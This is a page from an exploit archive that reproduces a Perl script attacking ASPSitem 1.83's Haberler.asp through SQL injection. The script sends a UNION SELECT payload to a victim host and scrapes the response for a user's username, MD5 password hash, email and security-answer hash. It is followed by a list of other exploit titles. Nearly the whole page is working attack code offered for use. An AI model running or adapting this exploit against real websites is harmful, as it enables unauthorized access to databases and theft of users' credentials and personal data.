exploits , vulnerabilities , articles , ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit

2006-05-28 ASPSitem <= 2.0 Remote (SQL Injection / DB Disclosure) Vulnerabilities

2006-04-19

ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit

Rated as : High Risk


#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=23
#Usage: aspsi.pl <host> <path>
use IO::Socket;
if(@ARGV != 3) { usage(); }
else { exploit(); }
sub header()
{
  print "\n- NukedX Security Advisory Nr.2006-23\r\n";
  print "- ASPSitem <= 1.83 Remote SQL Injection
Exploit\r\n";
}
sub usage() 
{
  header();
  print "- Usage: $0 <host> <path>\r\n";
  print "- <host> -> Victim's host ex:
www.victim.com\r\n";
  print "- <path> -> Path to ASPSitem ex:
/aspsitem/\r\n";
  exit();
}
sub exploit () 
{
  #Our variables...
  $asserver = $ARGV[0];
  $asserver =~ s/(http:\/\/)//eg;
  $ashost   = "http://".$asserver;
  $asdir    = $ARGV[1];
  $asport   = "80";
  $astar    = "Haberler.asp?haber=devam&id=";
  $asxp     =
"-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
  $asreq    = $ashost.$asdir.$astar.$asxp;
  #Sending data...
  header();
  print "- Trying to connect: $asserver\r\n";
  $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$asserver", PeerPort => "$asport") || die
"- Connection failed...\n";
  print $as "GET $asreq HTTP/1.1\n";
  print $as "Accept: */*\n";
  print $as "Referer: $ashost\n";
  print $as "Accept-Language: tr\n";
  print $as "User-Agent: NukeZilla\n";
  print $as "Cache-Control: no-cache\n";
  print $as "Host: $asserver\n";
  print $as "Connection: close\n\n";
  print "- Connected...\r\n";
  while ($answer = <$as>) {
    if ($answer =~ /class=\"tablo_baslik\"><b>»
(.*?)<\/b><\/td>/) {
      if ($1 == $ARGV[2]) {
        print "- Exploit succeed! Getting USERID: $ARGV[2]'s
credentials\r\n";
      }
      else { die "- Exploit failed\n"; }     
    }
    if ($answer =~ /\" align=\"left\">(.*?)</) {
      print "- Username: $1\r\n";
    }
    if ($answer =~ /Ekleyen  \(<b>(.*?)<\/b>\)/) {
      print "- MD5 HASH of PASSWORD: $1\r\n";
    }
    if ($answer =~ /\| (.*?) ]<br>/) {
      print "- Regdate: $1\r\n";
    }
    if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
      print "- Email: $1\r\n";
    }
    if ($answer =~ / Okunma : (.*?) /) {
      print "- MD5 hash of answer: $1\r\n";
      exit();
    }
  }
  #Exploit failed...
  print "- Exploit failed\n"
}
securitydot.net - 2006-04-19

Exploits - newest 10 RSS | More

2007-06-15 57271 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34203 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42424 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29329 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19769 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16706 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19404 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16593 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33606 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17231 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit